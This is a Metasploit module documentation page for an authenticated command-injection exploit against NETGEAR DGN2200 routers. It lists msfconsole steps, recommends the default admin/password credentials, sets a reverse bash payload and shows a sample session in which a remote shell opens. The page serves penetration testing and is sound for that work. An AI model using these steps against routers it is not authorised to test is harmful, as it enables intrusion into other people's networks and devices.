adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
baae9db092a4eaa4e6f3df65d22eded18d5fd20c
metasploit-gs/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md
T
Carter Brainerd (thecarterb) 6f086e9110 Fix broken link
2018-02-02 20:08:38 -05:00

3.2 KiB
Raw Blame History

Vulnerable Application

NETGEAR DGN2200v1, DGN2200v2, DGN2200v3, DGN2200v4 routers

Verification Steps

  1. start msfconsole
  2. use exploit/linux/http/netger_dnslookup_cmd_exec
  3. set RHOST 192.168.1.1 <--- Router IP
  4. set USERNAME xxxx (see here)
  5. set PASSWORD xxxx (see here)
  6. set PAYLOAD cmd/unix/reverse_bash
  7. set LHOST 192.168.1.x
  8. set LPORT xxxx
  9. run
  10. Get a session

Options

USERNAME

The USERNAME option sets the username to authenticate the request with. The command injection will not succeed if the username and password are not correct. The default username for NETGEAR Routers is admin. If you don't know the credentials, your best bet will be to use the default username and password.

PASSWORD

The PASSWORDoptions sets the password to authenticate the request with. The command injection will not succeed if the username and password are not correct. The default password for NETGEAR Routers is password. If you don't know the credentials, your best bet will be to use the default username and password.

Advanced Options

HOSTNAME

The request is went with a host_name POST parameter. This option sets this parameter. The default is www.google.com. The reason for the parameter is that the file that this vulnerability is located in (dnslookup.cgi) actually needs a domain to resolve, or else the injection won't work.

Scenarios

What it should look like against a vulnerable router.

msf > use exploit/linux/http/netgear_dnslookup_cmd_exec 
msf exploit(netgear_dnslookup_cmd_exec) > options

Module options (exploit/linux/http/netgear_dnslookup_cmd_exec):

 Name      Current Setting  Required  Description
 ----      ---------------  --------  -----------
 PASSWORD                   yes       Password to authenticate with
 Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
 RHOST                      yes       The target address
 RPORT     80               yes       The target port (TCP)
 SSL       false            no        Negotiate SSL/TLS for outgoing connections
 USERNAME                   yes       Username to authenticate with
 VHOST                      no        HTTP server virtual host


Exploit target:

 Id  Name
 --  ----
 0   NETGEAR DDGN2200 Router


msf exploit(netgear_dnslookup_cmd_exec) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netgear_dnslookup_cmd_exec) > set USERNAME admin
USERNAME => admin
msf exploit(netgear_dnslookup_cmd_exec) > set PASSWORD password
PASSWORD => password
msf exploit(netgear_dnslookup_cmd_exec) > run

[*] Started reverse TCP double handler on 192.168.1.9:4444 
[+] Router is a NETGEAR router (DGN2200v1)
[*] Sending payload...
[*] Command shell session 1 opened (192.168.1.9:4444 -> 192.168.1.9:53352) at 2017-03-02 19:36:47 -0500
Reference in New Issue View Git Blame Copy Permalink